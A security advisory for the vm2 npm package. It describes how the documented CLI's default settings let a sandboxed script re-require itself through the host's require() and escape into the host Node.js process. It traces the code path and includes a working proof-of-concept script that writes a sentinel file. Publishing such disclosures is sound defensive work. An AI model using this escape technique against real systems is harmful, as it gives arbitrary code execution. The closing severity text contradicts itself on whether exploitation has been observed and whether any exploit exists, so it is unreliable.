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GHSA-jxxv-8r27-vm4p
Summary
The vm2 command-line tool installed by npm install -g vm2 and documented in the README's "CLI" section runs the supplied script under NodeVM with require:{external:true} and no root / context / builtin configured. With these defaults the resolver loads every relative or absolute require() target through the host require() function, executing the attacker's module body in the host Node.js process before the result is ever proxied back into the sandbox. A single attacker-controlled file passed to vm2 ./script.js can call require(__filename) to re-execute itself in host realm and reach fs, child_process, etc. The documented sandbox runner is therefore equivalent to node ./script.js. No additional files, flags, or user interaction are required.
Details
The vulnerability lets a malicious sandboxed script - the file argument to the documented vm2 <file> CLI - execute arbitrary code in the host Node.js process, crossing the sandbox → host boundary that vm2 is meant to enforce.
Vulnerable code path
- Source -
bin/vm2:3→lib/cli.js:7-18.process.argv[2]is the attacker-authored script path. The CLI invokes:
WithoutNodeVM.file(path, { verbose: true, require: { external: true } });require.root,require.context, norrequire.builtin. - Hop -
lib/nodevm.js:618-636.NodeVM.filereads the file and callsnew NodeVM(options).run(body, resolvedFilename). - Hop -
lib/nodevm.js:335→lib/resolver-compat.js:205-266(makeResolverFromLegacyOptions). Destructuresexternal:true,rootPaths=undefined,hostRequire=defaultRequire(line 218),context='host'(default, line 219). Becausetypeof externalOpt !== 'object'(line 265) it returns aCustomResolverwithcheckedRootPaths=undefinedandpathContext = () => 'host'(line 263). - Hop -
lib/setup-node-sandbox.js:86-123(requireImpl). Sandboxrequire(id)resolves viaresolver.resolve(...)(lib/nodevm.js:380-383).lib/resolver.js:244-275handles absolute/relative specifiers;tryFileatlib/resolver.js:327-329gates onthis.isPathAllowed(x). - Barrier (gap) -
lib/resolver-compat.js:53-54:
With noisPathAllowed(filename) { if (this.rootPaths === undefined) return true;rootconfigured, every filesystem path is allowed.checkAccess(lib/resolver.js:39-42) delegates to the same method. - Sink -
lib/resolver-compat.js:74-77:loadJS(vm, mod, filename) { if (this.pathContext(filename, 'js') !== 'host') return super.loadJS(...); const m = this.hostRequire(filename); // ← host-realm require() mod.exports = vm.readonly(m); }hostRequireisdefaultRequire(lib/resolver-compat.js:20-23) - the real hostrequire(). The required module's top-level body executes in the host realm beforevm.readonly()wraps the exports; wrapping happens too late to constrain side-effects.loadNode(lib/resolver-compat.js:80-83) is identical for.nodenative addons (process.dlopenin host).
PoC
Save the following as /tmp/poc.js:
'use strict';
try {
// Host realm: fs is available - write sentinel and stop.
const fs = require('fs');
fs.writeFileSync('/tmp/vm2.proof', 'host pid=' + process.pid + '\n');
console.log('HOST realm: wrote /tmp/vm2.proof');
} catch (e) {
// Sandbox realm: require('fs') threw ENOTFOUND. Re-require this file -
// the CLI resolver loads it via host require() (resolver-compat.js:76).
console.log('sandbox realm: fs blocked (' + e.message + '); escaping');
require(__filename);
}
Run via the shipped CLI exactly as the README documents:
node ./bin/vm2 /tmp/poc.js # or `vm2 /tmp/poc.js` after `npm i -g vm2`
Observed output:
sandbox realm: fs blocked (Cannot find module 'fs'); escaping
HOST realm: wrote /tmp/vm2.proof
/tmp/vm2.proof exists, written by fs.writeFileSync from a script whose
direct require('fs') was blocked by the sandbox. The first line proves the
boundary exists; the second proves it was crossed.
Impact
A user who follows the README's CLI section and runs vm2 ./untrusted.js on an
attacker-supplied file gets arbitrary code execution as that user - the
sandbox provides no isolation in this configuration. The blast radius is the
full host Node.js process: fs, child_process, process.dlopen, network,
environment.
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The vulnerability requires local access to the device to be exploited. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. The attacker needs the user to perform some action, like clicking a link. The vulnerability can affect other systems as well, not just the initial system. There is a high impact on the confidentiality of the information. There is a high impact on the integrity of the data. There is a high impact on the availability of the system.
Exploitation activity has been observed. Apply available patches or mitigations urgently.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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